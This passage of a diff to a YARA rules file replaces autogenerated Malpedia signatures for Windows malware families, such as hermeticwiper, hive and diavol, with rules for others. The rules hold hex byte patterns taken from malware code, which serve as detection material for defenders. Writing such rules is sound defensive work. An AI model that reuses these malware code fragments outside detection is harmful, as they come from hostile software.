-		$sequence_29 = { 8945e4 8b4dec e8???????? 833800 }
-		$sequence_30 = { 50 8b4d10 8b11 ffd2 83c404 }
-		$sequence_31 = { 8b4dfc 8b5108 0fb602 50 8b4dfc e8???????? }
-		$sequence_32 = { 85d2 7526 8d4d90 e8???????? 0fb6c0 85c0 }
-		$sequence_33 = { 83c118 e8???????? 8945f8 837df804 7408 837df808 740c }
-		$sequence_34 = { 83c00c 6a00 50 e8???????? 84c0 }
-		$sequence_35 = { 8b4dfc 8b5008 3b5104 7505 83c8ff eb1e 8b45fc }
+		$sequence_0 = { 8bda c1e305 03c3 8bda }
+		$sequence_1 = { ac 8bda c1e305 03c3 8bda c1eb02 }
+		$sequence_2 = { 33c0 ac 8bda c1e305 03c3 }
+		$sequence_3 = { c1e305 03c3 8bda c1eb02 03c3 }
+		$sequence_4 = { 8a6201 80f457 8acc 80e103 }
+		$sequence_5 = { 8bda c1e305 03c3 8bda c1eb02 }
+		$sequence_6 = { 33c0 ac 8bda c1e305 }
+		$sequence_7 = { 8acc 80e103 8aec c0ed03 }
+		$sequence_8 = { 8a6201 80f457 8acc 80e103 8aec c0ed03 80e507 }
+		$sequence_9 = { 80e703 c0eb05 80e303 80ff00 }
 
 	condition:
-		7 of them and filesize < 33134592
+		7 of them and filesize < 1106944
 }
-rule MALPEDIA_Win_Shortleash_Auto : FILE
+rule MALPEDIA_Win_Webc2_Div_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b69c5abe-5ff2-5cda-b15d-4ffaeea772b2"
+		id = "0487cd24-3efb-59f7-a789-643d02cfd1b0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shortleash"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shortleash_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_div_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "7625917da117618d50239e800ec3508d722326f3509a4fb7631eb7833bd5c208"
+		logic_hash = "fd0dce640f74e7a720d2663bbcad05a022471937161b3c94d0276bbf1eb69f1b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136820,32 +136495,32 @@ rule MALPEDIA_Win_Shortleash_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff10 83c8ff f00fc1430c 83f801 750c 488b4c2450 488b01 }
-		$sequence_1 = { e9???????? 4055 4883ec20 488bea ba90000000 488b4d30 e8???????? }
-		$sequence_2 = { f30f7f4de8 4533f6 4c8975f8 418d4e10 e8???????? 488bd8 488d45d8 }
-		$sequence_3 = { e9???????? 488d15d5580200 488bcf e8???????? 85c0 7504 488d7706 }
-		$sequence_4 = { e8???????? 488bd0 488d4c2440 e8???????? 90 488b8eb0000000 e8???????? }
-		$sequence_5 = { eb09 4c394810 7453 488b00 493b00 75f2 4d8b00 }
-		$sequence_6 = { b910000000 e8???????? 488906 488d0d0e020000 488d1533090000 48895308 48890b }
-		$sequence_7 = { ff15???????? 488b542458 488bcb e8???????? 488b542450 488d4b08 e8???????? }
-		$sequence_8 = { e8???????? 8bf0 85c0 0f8548010000 488b4530 4c8d8348010000 482b8390000000 }
-		$sequence_9 = { ff15???????? 4839b3a8000000 7442 488bcb e8???????? 488b8ba8000000 e8???????? }
+		$sequence_0 = { 7474 56 6800000080 56 56 }
+		$sequence_1 = { 8078056e 7512 80780663 750c 80780765 7506 }
+		$sequence_2 = { 8d7d02 83c9ff c70001000000 8d5008 33c0 f2ae f7d1 }
+		$sequence_3 = { c3 55 e8???????? 59 33c0 ebf0 81ec10020000 }
+		$sequence_4 = { 7573 80780661 756d 80780766 }
+		$sequence_5 = { 7f09 0fbed0 83ea17 89148e 8d6901 bf16000000 8bc5 }
+		$sequence_6 = { 6a20 53 ffd6 59 85c0 }
+		$sequence_7 = { ff742410 eb14 817c2410808d5b00 771a 8b442414 }
+		$sequence_8 = { 83e803 bf???????? 80240100 83c9ff 33c0 f2ae f7d1 }
+		$sequence_9 = { 8b048e 8d1c9510114000 8b17 2bc2 99 }
 
 	condition:
-		7 of them and filesize < 2415616
+		7 of them and filesize < 32768
 }
-rule MALPEDIA_Win_Pngdowner_Auto : FILE
+rule MALPEDIA_Win_Wscspl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e2dbfe40-d617-5d1b-bbce-59a19338c6f8"
+		id = "7d78cbcb-c636-58e3-9d8d-70bd821838ca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pngdowner_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wscspl_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "c7a4cf22317ae6eb6a1b63ad8076fbfd6db12b13640e6a0471f645fcbb28ed9a"
+		logic_hash = "a06a73900ca2c0d42b899a919a39813227fe95be2c044a4b97a03a121cdc8aa6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136859,32 +136534,32 @@ rule MALPEDIA_Win_Pngdowner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c410 85c0 0f856d010000 8d842418020000 8d8c2498010000 50 }
-		$sequence_1 = { b910270000 f7f9 52 68???????? 8d942424010000 }
-		$sequence_2 = { 83f85a 7714 8088????????10 8ac8 80c120 888800e44000 }
-		$sequence_3 = { b910270000 f7f9 52 68???????? }
-		$sequence_4 = { 83c8ff eb1f 8bce 83e61f c1f905 8bc6 8b0c8d40e64000 }
-		$sequence_5 = { 99 b910270000 f7f9 8d84241c010000 }
-		$sequence_6 = { e8???????? 85ff 0f85cf000000 53 8b5c2428 55 }
-		$sequence_7 = { 8d7c2420 8d542420 f3ab 8d4c2414 51 6800000100 }
-		$sequence_8 = { 50 89542414 c644240d73 ff15???????? 85c0 7430 68???????? }
-		$sequence_9 = { 0f84e9000000 8b7508 8b7d0c 8d0520e34000 }
+		$sequence_0 = { 0f8464020000 8b3d???????? f644243810 8a442464 0f8481000000 3c2e }
+		$sequence_1 = { 885c342c ffd5 a3???????? a3???????? b8???????? }
+		$sequence_2 = { 33d2 33c9 8d5c2418 e8???????? 8b8c2494230000 83c414 5b }
+		$sequence_3 = { c705????????01000000 e8???????? 891d???????? eb25 }
+		$sequence_4 = { 51 50 ff15???????? 2935???????? 83c40c }
+		$sequence_5 = { 5f 8935???????? 5e 5d 8b8c2488230000 }
+		$sequence_6 = { 6a01 50 ff15???????? 687c230000 68c10b0000 }
+		$sequence_7 = { 8d443410 68???????? 50 e8???????? 668b0d???????? }
+		$sequence_8 = { 68ba0b0000 33d2 33c9 8d9c24a4050000 }
+		$sequence_9 = { 2bc1 8b4c2448 03f0 8b442444 ba3f3a0000 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 901120
 }
-rule MALPEDIA_Win_Hermeticwiper_Auto : FILE
+rule MALPEDIA_Win_Nightclub_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "26ab54c0-79a4-58b9-ba8b-0324b07af9f4"
+		id = "25a4cb0b-5988-50b4-b9d7-c4130dae5827"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hermeticwiper_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nightclub_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "0d202d4a6b1fd92490b3e5fc04dc1683d573bc3458e17749b676604435662c74"
+		logic_hash = "15f8ebb368b37ab60005cfeccfb61f1f120d9d4f8ce48162386ff7677923e6da"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136898,34 +136573,34 @@ rule MALPEDIA_Win_Hermeticwiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83d1ff 894dbc 03ff 83cf01 ebe7 8b75d4 }
-		$sequence_1 = { 68???????? eb2f ff15???????? 3d7e040000 0f8522040000 837df800 }
-		$sequence_2 = { 0f86fe000000 8b55d0 8d4630 8945f8 6690 8b00 85c0 }
-		$sequence_3 = { 53 51 51 52 b980000000 e8???????? 8b4c2428 }
-		$sequence_4 = { 8845fb 84e4 0f856dfeffff 5f 5e 5b 8be5 }
-		$sequence_5 = { 8b4e10 8b7e08 03cf 8b560c 8b4614 13c2 89542418 }
-		$sequence_6 = { 83ee02 eb02 8bf3 397df0 7531 6a5c 6a00 }
-		$sequence_7 = { 8b401c 83c118 03c1 8b4c2414 89442424 3bf0 736e }
-		$sequence_8 = { 57 56 ff15???????? 85c0 752a ff15???????? 33ff }
-		$sequence_9 = { 5e b801000000 5b 8be5 5d c20c00 8b7510 }
+		$sequence_0 = { 50 8d45f4 64a300000000 8b4508 8d75d4 c745ec00000000 e8???????? }
+		$sequence_1 = { 889d5ffeffff ff15???????? 8d855efeffff c645fc05 50 }
+		$sequence_2 = { c645fc0c ff15???????? 85c0 0f8827010000 8b0d???????? 8b11 52 }
+		$sequence_3 = { 83c404 85c9 7517 33c0 8b450c 8d0442 5f }
+		$sequence_4 = { 8bff 8d45d4 8bcf e8???????? 50 c745fc01000000 8b4e08 }
+		$sequence_5 = { ff15???????? 83c610 3bf7 75f1 8b4304 50 ff15???????? }
+		$sequence_6 = { 83f806 7753 0fb69058720010 ff249550720010 ba???????? 8bc7 8d742430 }
+		$sequence_7 = { eb03 8945fc a1???????? 8b08 51 6a00 8d4e74 }
+		$sequence_8 = { 834dec01 85c0 7505 a1???????? 8bf0 8d4900 }
+		$sequence_9 = { 72e6 b892010000 5f 5e 8b4df8 33cd e8???????? }
 
 	condition:
 		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Hive_Auto : FILE
+rule MALPEDIA_Win_Cloudeye_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "afed1177-c874-5c40-8ff0-eb8fbf356303"
+		id = "44608db0-2b3b-55a4-82c4-1c5317afcfea"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hive_auto.yar#L1-L195"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cloudeye_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "2741699b9ca4dafd7c3cf41d98fd9bcda89c6f9e810164b470706ce97b3270bd"
+		logic_hash = "54d2e3ccac7509c285f63d14127016b59266a9af9b4d7112de2a7058fc6a0ca1"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -136937,44 +136612,32 @@ rule MALPEDIA_Win_Hive_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 31c0 b91d000000 31d2 31db }
-		$sequence_1 = { 31c9 eb12 0fb6540c12 0fb63408 }
-		$sequence_2 = { 89c2 e8???????? b801000000 e8???????? }
-		$sequence_3 = { 31c9 31d2 31db 31f6 31ff eb09 }
-		$sequence_4 = { 31c0 31c9 31d2 bb01000000 beae000000 }
-		$sequence_5 = { 89d1 e8???????? b802000000 e8???????? }
-		$sequence_6 = { 81c4b0000000 c3 e8???????? 90 }
-		$sequence_7 = { 0fb6b40495000000 89d7 31f2 01c2 }
-		$sequence_8 = { 89d1 e8???????? b901000000 e8???????? }
-		$sequence_9 = { 0fb7442404 8b0c24 894c246a 668944246e 8b4c246a }
-		$sequence_10 = { 0fb7744c12 89d7 31f2 01ca }
-		$sequence_11 = { 31c9 31d2 bb04000000 beb8000000 }
-		$sequence_12 = { 01c1 83c101 83f90c 0f820fffffff }
-		$sequence_13 = { 89bc2478020000 81c438020000 c3 97 88442443 97 892c24 }
-		$sequence_14 = { 01c8 89c1 c1e91f ffc9 }
-		$sequence_15 = { 89bc2480000000 89b424c4000000 29ce 46 }
-		$sequence_16 = { 01c1 c1e106 0fb6c2 01c8 }
-		$sequence_17 = { 01c2 b8ffffff03 21c5 21c3 }
-		$sequence_18 = { 01c8 c1e006 400fb6cf 01c1 }
-		$sequence_19 = { 01c1 c1e106 400fb6d6 01ca }
-		$sequence_20 = { 01ca c1e206 0fb6c3 01d0 }
-		$sequence_21 = { 01c0 4000f8 0fb6c0 48898424b0000000 }
+		$sequence_0 = { 64ff35c0000000 8f4548 c3 60 b055 }
+		$sequence_1 = { c70010000100 80fc8b ffb700500000 39c9 6afe ff5528 }
+		$sequence_2 = { 85da 8b4d18 bafee5190e e8???????? }
+		$sequence_3 = { 7570 206b65 7900 e8???????? 53 }
+		$sequence_4 = { ff50e0 6639d1 61 b8ffffffff }
+		$sequence_5 = { 83f800 0f8598000000 6685c1 8b4d20 81c100410000 c70107000100 51 }
+		$sequence_6 = { 81c29c000000 52 6a07 6aff 38ed 50 e8???????? }
+		$sequence_7 = { 5b 6685da 31c0 83c004 }
+		$sequence_8 = { 8bb714080000 38ef 8b8700080000 01f0 01c8 }
+		$sequence_9 = { 85db 837d7401 750a e8???????? 83f801 7405 }
 
 	condition:
-		7 of them and filesize < 7946240
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Chches_Auto : FILE
+rule MALPEDIA_Win_Fakeword_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef78cd53-b90a-5608-a384-2a896eb61dd5"
+		id = "83704e50-1dbd-5c9a-b83f-e831a9bf7880"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chches_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fakeword_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "b0a1cb7e042feb67b6afb2859125bb6309d891a3da8da2205204e42953893b2e"
+		logic_hash = "109b39226f4f475b4c3e023db9ba2c26fa6ab8a72ccbfd12335d1989ed05d36a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136988,77 +136651,71 @@ rule MALPEDIA_Win_Chches_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b4c243c 8903 8b4534 83c408 85c0 }
-		$sequence_1 = { ffd2 3dfe1f0000 7608 83eb64 e9???????? 8b7c2454 }
-		$sequence_2 = { 03c1 50 57 e8???????? 8b96d8000000 83c408 6860ea0000 }
-		$sequence_3 = { c7460800000000 8b4744 56 6a00 ffd0 8b4f50 50 }
-		$sequence_4 = { 897c2424 897c2430 3bc7 0f856c020000 8b5d0c 3bdf 0f8404030000 }
-		$sequence_5 = { 0f84aa010000 8b4660 8bd1 52 ffd0 8b5644 8bd8 }
-		$sequence_6 = { 8d791c 81c61d051101 85ff 746e 85db 744d 8b550c }
-		$sequence_7 = { 50 8b4364 ffd0 8b4df8 8b938c000000 6a00 6a00 }
-		$sequence_8 = { 33d2 6689140f 8b7c2410 eb1e 85c0 751a 8b03 }
-		$sequence_9 = { ffd2 50 8b4650 ffd0 8b4dfc 51 8d7df8 }
+		$sequence_0 = { 750d 381c08 7408 8bd1 8915???????? 8a0408 3ac3 }
+		$sequence_1 = { 89442418 33c0 8a07 50 }
+		$sequence_2 = { 03ce 0fbe540cd8 52 68???????? 50 ff15???????? 83c40c }
+		$sequence_3 = { 41 81f900010000 89448afc 7cd4 }
+		$sequence_4 = { 83e210 f3ab 80fa10 c684246c02000007 743d 8d442458 }
+		$sequence_5 = { 83f804 7519 56 6a07 8d442418 }
+		$sequence_6 = { 3a5418ff 750b 83f801 7459 3a5418fe 7453 40 }
+		$sequence_7 = { 8b6c2420 8b4c2430 8b5c2434 41 83c304 83f908 894c2430 }
+		$sequence_8 = { c3 8b4c241c 56 51 e8???????? 8b442414 }
+		$sequence_9 = { 85ff 7446 8b7010 8b042f 03fd 03f5 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Misfox_Auto : FILE
+rule MALPEDIA_Win_Unidentified_101_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c26cb13-6097-513e-b029-4599c7648809"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.misfox_auto.yar#L1-L165"
+		id = "1e5a977c-e7e9-5732-97b6-6aadc4f691fc"
+		date = "2023-03-28"
+		modified = "2023-04-07"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_101_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "d0174e7f68a85bf1ff57434ec100f8da7228de9ad77dd40f610066f3391b57bd"
+		logic_hash = "71f0751fbd77a928634515b558d06922b4bf4a312042d6abbd6ba70171c64843"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20230328"
+		malpedia_hash = "9d2d75cef573c1c2d861f5197df8f563b05a305d"
+		malpedia_version = "20230407"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85f4ebffff 50 8b8528e5ffff 8b048550870110 }
-		$sequence_1 = { 8a0a 42 884dab 83f80b 0f877b020000 ff2485b4d30010 }
-		$sequence_2 = { 8947fc 894c9308 81fe00010000 7ccc }
-		$sequence_3 = { 85f6 75e8 8b5c2410 68???????? 8d8424e8000000 6a20 }
-		$sequence_4 = { 0f85a0000000 8b4c240c 8d542418 50 50 50 }
-		$sequence_5 = { 8b06 6a25 40 50 8d45d0 50 }
-		$sequence_6 = { 8d8c24a4000000 c784245003000000000000 e8???????? 8d4c246c }
-		$sequence_7 = { 8b4708 8d5704 8902 8b45b8 52 c70300000000 40 }
-		$sequence_8 = { ff15???????? 483305???????? 488d15cabc0000 488bcb }
-		$sequence_9 = { 442bc8 b8b1f98cb3 41f7e9 b8b1f98cb3 458d0411 41c1f80a }
-		$sequence_10 = { 4c897c2438 8b442440 89442430 4c897c2428 4c897c2420 4533c9 }
-		$sequence_11 = { 4889442450 e8???????? 488d053cf90000 488d15b56c0100 }
-		$sequence_12 = { 7526 4c8d3505500100 493bde 7408 }
-		$sequence_13 = { 803c3000 75f7 4c8bc6 488d542438 498bce e8???????? 498bc6 }
-		$sequence_14 = { 0f114580 f20f100d???????? f20f114d90 8b05???????? 894598 }
-		$sequence_15 = { e9???????? 4c8d25af510100 8bee 41bf01000000 }
+		$sequence_0 = { c70016000000 e8???????? 83c8ff e9???????? 498bc4 488d0ddb070100 83e03f }
+		$sequence_1 = { 6689842404010000 b865000000 6689842406010000 33c0 6689842408010000 }
+		$sequence_2 = { 33c0 b968000000 f3aa 488d842400010000 4889442448 488d842430020000 4889442440 }
+		$sequence_3 = { 4889742410 57 4883ec20 418bf0 4c8d0debb40000 8bda 4c8d05dab40000 }
+		$sequence_4 = { c744243000000000 4c8d4c2430 4c8b442440 8b542468 488b4c2460 }
+		$sequence_5 = { c68424e900000065 c68424ea00000057 c68424eb00000000 c644243052 c644243165 c644243261 c644243364 }
+		$sequence_6 = { 428a8c1910e40100 4c2bc0 418b40fc 4d894108 d3e8 41894120 }
+		$sequence_7 = { 48c744242000000000 4c8d8c24c8000000 448b442450 488b542458 488b4c2470 ff15???????? }
+		$sequence_8 = { 41b804010000 488d942400030000 33c9 ff15???????? c744245801000000 e8???????? 833d????????01 }
+		$sequence_9 = { 7528 48833d????????00 741e 488d0dd8450100 e8???????? 85c0 740e }
 
 	condition:
-		7 of them and filesize < 266240
+		7 of them and filesize < 402432
 }
-rule MALPEDIA_Win_Diavol_Auto : FILE
+rule MALPEDIA_Win_Statc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bc879f2f-8309-5494-be6c-2895dcf861fb"
+		id = "808b480a-a4a8-5b96-a652-004f7a1eca10"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.diavol_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.statc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.statc_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "46d9c76f218871fb04ea7d4fbbcd65e671198d70df944c765e3f433c4820310f"
+		logic_hash = "d41663c5e21054ad8e54e8097dd90a58bbd0b9def413c1922ece24784d1402b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137072,32 +136729,32 @@ rule MALPEDIA_Win_Diavol_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8be5 5d c3 8d85c8fbffff 50 56 c785c8fbffff2c020000 }
-		$sequence_1 = { 3bc3 72d8 8d8da0fdffff 68???????? 51 68???????? 8bd1 }
-		$sequence_2 = { 83f8ff 752c 6a02 53 ff15???????? 53 ff15???????? }
-		$sequence_3 = { 8d740004 56 e8???????? 83c404 56 8d95f8fdffff }
-		$sequence_4 = { 0f84d4000000 6800040000 8d95f8f9ffff 6a00 52 }
-		$sequence_5 = { 668b08 83c002 6685c9 75f5 8dbdf4efffff 2bc2 83c7fe }
-		$sequence_6 = { 56 ff15???????? 57 e8???????? a1???????? 8b4dd0 8d1448 }
-		$sequence_7 = { 8b8d38c2ffff 8d953cc2ffff 52 8d8540c2ffff 6a00 50 }
-		$sequence_8 = { 8be5 5d c3 8d8405c0fbffff }
-		$sequence_9 = { 8be5 5d c3 b902000000 6a50 }
+		$sequence_0 = { 85c0 7409 8984248c000000 ebc5 488d942488000000 488bcf e8???????? }
+		$sequence_1 = { c6040129 e9???????? 4d8b4010 488d15c9dd2700 488d4def 4d8b00 e8???????? }
+		$sequence_2 = { 7f1d 8b8424e0000000 448bca ba69000000 89442420 488bcb e8???????? }
+		$sequence_3 = { b807000000 8bc8 894344 488bcb 8bd0 e8???????? e9???????? }
+		$sequence_4 = { e9???????? 488d8ab8010000 e9???????? 488d8ad0000000 e9???????? 488d8a90000000 e9???????? }
+		$sequence_5 = { c645d01c c745d401000000 488975e0 48894598 488d4d90 488b4580 4533e4 }
+		$sequence_6 = { e8???????? 488bcf e8???????? 48c70300000000 4d85ed 7409 498bcd }
+		$sequence_7 = { 48f7e2 488bf2 48c1ee04 48ffc6 0fbe43f1 84c0 740d }
+		$sequence_8 = { e8???????? 8bf8 896c2450 3b44243c 7413 488d15da212800 488bce }
+		$sequence_9 = { ff15???????? 488b4b18 33c0 48898318020000 48898320020000 898328020000 898378020000 }
 
 	condition:
-		7 of them and filesize < 191488
+		7 of them and filesize < 6429696
 }
-rule MALPEDIA_Win_Simda_Auto : FILE
+rule MALPEDIA_Win_Pandora_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "27bb9bc3-3123-59db-b496-71430a74b58c"
+		id = "03d00108-515b-5000-bfce-e0864b2e89ce"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.simda_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pandora_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "e9f68a5c932750dc8dc15c371abf1fcbed20271ad653ffccba6ba46621ea82a8"
+		logic_hash = "a88747b8869f7f515751ff70f3553c380e5110ab9369144ac753a62c000a1cae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137111,32 +136768,32 @@ rule MALPEDIA_Win_Simda_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8955ec 897de0 3bce 0f8278feffff 5b }
-		$sequence_1 = { 83c424 33c0 668945d0 8845fe }
-		$sequence_2 = { 8b85e8feffff 85c0 7505 8d41ff eb0f 83f801 }
-		$sequence_3 = { 33f6 68ff000000 8d85f1feffff 56 50 }
-		$sequence_4 = { 83ec24 53 56 57 50 6800040000 }
-		$sequence_5 = { 83c408 8945f0 85c0 7508 6a01 }
-		$sequence_6 = { 8bf8 0faf7dfc c1e210 0b55f8 3bfa }
-		$sequence_7 = { b910000000 be???????? 8d7db4 f3a5 66a5 }
-		$sequence_8 = { 8bd1 c1ea10 8955ec 8bf8 }
-		$sequence_9 = { 85c0 75dd 8b4d0c 8bc3 2bc2 }
+		$sequence_0 = { 41ffc7 83f81e 0f8f88030000 4885ff 7418 488d47ff 498d04c6 }
+		$sequence_1 = { 7424 838da400000010 448d4710 4c8b0d???????? 488d4c2430 33d2 41ffd1 }
+		$sequence_2 = { 48897c2418 4156 4883ec20 33ff 4533f6 4863df 488d0d88040300 }
+		$sequence_3 = { 415e c3 48895c2408 4889742410 57 4883ec20 4c8b5108 }
+		$sequence_4 = { 4c8d45b0 488d55c8 e8???????? 8bd8 85c0 7524 f7de }
+		$sequence_5 = { 8bcf 44335014 c1e918 0fb6d1 8bce }
+		$sequence_6 = { 498b06 4885c0 0f8432020000 8b4008 ffc8 83f806 0f8724020000 }
+		$sequence_7 = { 488b05???????? 33d2 498bcc ffd0 4c8b642460 4c8b742448 488b7c2440 }
+		$sequence_8 = { 0bc8 0fb64238 c1e108 0bc8 0fb6423e 440bd0 894c2440 }
+		$sequence_9 = { 4503d3 418bc6 23c6 41c1c60a 0bf8 4181c34efd53a9 81c7e9766d7a }
 
 	condition:
-		7 of them and filesize < 1581056
+		7 of them and filesize < 1032192
 }
-rule MALPEDIA_Win_Mbrlocker_Auto : FILE
+rule MALPEDIA_Win_Aytoke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a472526-8a03-5ccc-a5eb-10b46b34c6da"
+		id = "c3996e13-6441-5e12-8e21-a4d953c38877"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mbrlocker_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aytoke_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "2abe677d378843746aa6479444a4219927906b009fff2766ade4f081783dbae6"
+		logic_hash = "0f3d6db514704761aece6f3ecc8a4a906e89108d57be9f7f2ba95aab9464ffc7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137150,34 +136807,34 @@ rule MALPEDIA_Win_Mbrlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8b35???????? 8b3d???????? 6a10 68???????? }
-		$sequence_1 = { 68fe000000 68???????? ffd7 83c408 }
-		$sequence_2 = { 68ac000000 68???????? e8???????? 68ac000000 68???????? ffd7 83c408 }
